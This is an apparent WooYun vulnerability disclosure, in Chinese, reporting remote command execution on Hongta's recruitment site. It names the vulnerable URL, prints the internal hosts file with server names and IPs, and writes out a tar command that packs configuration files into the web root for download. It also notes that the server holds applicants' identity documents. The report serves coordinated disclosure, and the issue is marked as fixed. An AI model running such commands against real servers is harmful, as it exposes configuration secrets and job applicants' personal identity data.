乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-15: 细节已通知厂商并且等待厂商处理中 2016-05-20: 厂商已经确认,细节仅向厂商公开 2016-05-30: 细节向核心白帽子及相关领域专家公开 2016-06-09: 细节向普通白帽子公开 2016-06-19: 细节向实习白帽子公开 2016-07-04: 细节向公众公开
命令执行
红塔招聘
http://zp.hongta.com/HRWEB/hr/recruitInfoParentAction/getNotices
★K8cmd-> cat /etc/hosts====================================================================================================================================127.0.0.1 localhost loopback::1 localhost loopback10.96.66.138 c1ep2vm138.hongta.com c1ep2vm13810.96.66.13 c1ep1vm13.hongta.com10.96.66.22 c1ep1vm22.hongta.com10.96.66.194 c1ep3vm194.hongta.com c1ep3vm194fd8c:215d:178e:1419:6bcd:13ff:fe60:d84d c1ep2vm138-6.hongta.com c1ep2vm138-6fd8c:215d:178e:1419:290:fa71:fa37:f562 ntp28216.hongta.com ntp28216fd8c:215d:178e:1419:290:fa72:fa37:f562 IBMWorkloadDeployer#bpm db server 10.96.66.11 c1ep1vm11.hongta.com10.96.66.12 c1ep1vm12.hongta.com10.96.66.13 c1ep1vm13.hongta.com10.96.66.22 c1ep1vm22.hongta.com#bpm http server10.96.66.9 c1ep1vm9.hongta.com10.96.66.25 c1ep1vm25.hongta.com#bpm was10.96.66.26 c1ep1vm26.hongta.com10.96.66.27 c1ep1vm27.hongta.com10.96.66.31 c1ep1vm31.hongta.com#bpm was console10.96.66.24 c1ep1vm24.hongta.com#ep was10.96.66.32 c1ep1vm32.hongta.com10.96.66.33 c1ep1vm33.hongta.com10.96.66.34 c1ep1vm34.hongta.com10.96.66.35 c1ep1vm35.hongta.com#ep http server10.96.66.36 c1ep1vm36.hongta.com10.96.66.37 c1ep1vm37.hongta.com#ep was console10.96.66.38 c1ep1vm38.hongta.com#tam tim server 10.96.66.30 c1ep1vm30.hongta.com10.96.66.40 c1ep1vm40.hongta.com#ldap10.96.66.29 c1ep1vm29.hongta.com10.96.66.46 c1ep1vm46.hongta.com10.96.66.47 c1ep1vm47.hongta.com#org server10.96.66.53 c1ep1vm53.hongta.com#issue server10.96.66.48 c1ep1vm48.hongta.com#hr zp ihs10.96.66.19 c1ep1vm19.hongta.com#hr zp was10.96.66.138 c1ep1vm138.hongta.com10.96.66.195 c1ep1vm195.hongta.com10.96.66.194 c1ep1vm194.hongta.com#mobile was10.96.66.130 c1ep1vm130.hongta.com10.96.66.132 c1ep1vm132.hongta.com10.96.66.133 c1ep1vm133.hongta.com#mobile ihs10.96.66.137 c1ep1vm137.hongta.com
服务器内含大量应聘者证件信息
资源全都在这个目录
/opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/upload/
打个包,文件就全下来了比如我想看看配置
tar -cvf /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/wpp.tar.gz /opt/IBM/WebSphere/Profiles/HRWebProfile/installedApps/HRWebCell/HRWEB_war.ear/HRWEB.war/WEB-INF/
访问http://zp.hongta.com/HRWEB/wpp.tar.gz就把配置什么down下来了,证件那些更是小意思
补丁,关闭debug模式
危害等级:中
漏洞Rank:8
确认时间:2016-05-20 08:19
已对该漏洞进行修复
暂无